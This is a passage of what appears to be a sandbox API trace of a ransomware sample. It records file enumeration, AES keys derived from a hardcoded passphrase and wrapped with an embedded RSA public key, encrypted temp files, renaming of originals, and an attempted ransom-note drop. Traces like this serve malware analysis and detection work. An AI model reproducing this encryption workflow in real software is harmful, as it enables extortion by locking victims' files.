lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0236.751] CloseHandle (hObject=0xffffffff) returned 1 [0236.751] CloseHandle (hObject=0xffffffff) returned 1 [0236.751] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), bFailIfExists=0) returned 0 [0236.752] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", dwFileAttributes=0x0) returned 0 [0236.752] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.gsg")) returned 0 [0236.752] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.fuck")) returned 0 [0236.753] CryptDestroyHash (hHash=0x28171d8) returned 1 [0236.753] CryptDestroyKey (hKey=0x28173d8) returned 1 [0236.753] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.753] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0236.753] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0236.753] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\readme_back_files.htm")) returned 0xffffffff [0236.753] AreFileApisANSI () returned 1 [0236.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0236.753] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.753] GetLastError () returned 0x5 [0236.753] GetLastError () returned 0x5 [0236.754] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.754] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.754] GetLastError () returned 0x5 [0236.754] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico")) returned 0x20 [0236.754] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", dwFileAttributes=0x80) returned 0 [0236.754] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.754] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.755] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.755] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.770] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.770] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.770] CryptHashData (hHash=0x2817298, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.770] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817118) returned 1 [0236.770] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.770] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.770] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815110) returned 1 [0236.772] CryptImportPublicKeyInfo (in: hCryptProv=0x2815110, dwCertEncodingType=0x1, pInfo=0x280a440*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a470*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a478*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28173d8) returned 1 [0236.772] CryptEncrypt (in: hKey=0x28173d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.772] CryptEncrypt (in: hKey=0x28173d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28157f8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28157f8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.772] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28157f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.772] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.772] CryptEncrypt (in: hKey=0x2817118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.772] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.772] CloseHandle (hObject=0xffffffff) returned 1 [0236.772] CloseHandle (hObject=0xffffffff) returned 1 [0236.773] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), bFailIfExists=0) returned 0 [0236.773] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", dwFileAttributes=0x0) returned 0 [0236.773] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.gsg")) returned 0 [0236.773] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.fuck")) returned 0 [0236.774] CryptDestroyHash (hHash=0x2817298) returned 1 [0236.774] CryptDestroyKey (hKey=0x2817118) returned 1 [0236.774] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.774] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.774] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.774] GetLastError () returned 0x5 [0236.774] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico")) returned 0x20 [0236.774] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", dwFileAttributes=0x80) returned 0 [0236.774] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.775] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.775] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.775] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.784] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.784] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.784] CryptHashData (hHash=0x2817118, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.784] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817118, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28171d8) returned 1 [0236.784] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.784] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.784] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815198) returned 1 [0236.785] CryptImportPublicKeyInfo (in: hCryptProv=0x2815198, dwCertEncodingType=0x1, pInfo=0x280aac0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280aaf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280aaf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817598) returned 1 [0236.785] CryptEncrypt (in: hKey=0x2817598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.785] CryptEncrypt (in: hKey=0x2817598, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815660*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815660*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.785] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815660, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.786] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.786] CryptEncrypt (in: hKey=0x28171d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.786] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.786] CloseHandle (hObject=0xffffffff) returned 1 [0236.786] CloseHandle (hObject=0xffffffff) returned 1 [0236.786] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), bFailIfExists=0) returned 0 [0236.786] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", dwFileAttributes=0x0) returned 0 [0236.786] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.gsg")) returned 0 [0236.787] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.fuck")) returned 0 [0236.787] CryptDestroyHash (hHash=0x2817118) returned 1 [0236.787] CryptDestroyKey (hKey=0x28171d8) returned 1 [0236.787] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.787] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.787] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.787] GetLastError () returned 0x5 [0236.787] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico")) returned 0x20 [0236.787] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", dwFileAttributes=0x80) returned 0 [0236.788] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.788] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.788] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.788] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.793] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.793] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.793] CryptHashData (hHash=0x2817118, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.793] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817118, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817298) returned 1 [0236.793] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.793] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.793] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28152a8) returned 1 [0236.797] CryptImportPublicKeyInfo (in: hCryptProv=0x28152a8, dwCertEncodingType=0x1, pInfo=0x280a6b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a6e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a6e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817bd8) returned 1 [0236.797] CryptEncrypt (in: hKey=0x2817bd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.797] CryptEncrypt (in: hKey=0x2817bd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815990*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815990*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.797] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815990, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.797] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.797] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.797] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.798] CloseHandle (hObject=0xffffffff) returned 1 [0236.798] CloseHandle (hObject=0xffffffff) returned 1 [0236.798] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), bFailIfExists=0) returned 0 [0236.798] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", dwFileAttributes=0x0) returned 0 [0236.798] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.gsg")) returned 0 [0236.799] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.fuck")) returned 0 [0236.799] CryptDestroyHash (hHash=0x2817118) returned 1 [0236.799] CryptDestroyKey (hKey=0x2817298) returned 1 [0236.799] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.799] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.799] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.799] GetLastError () returned 0x5 [0236.799] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico")) returned 0x20 [0236.799] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device 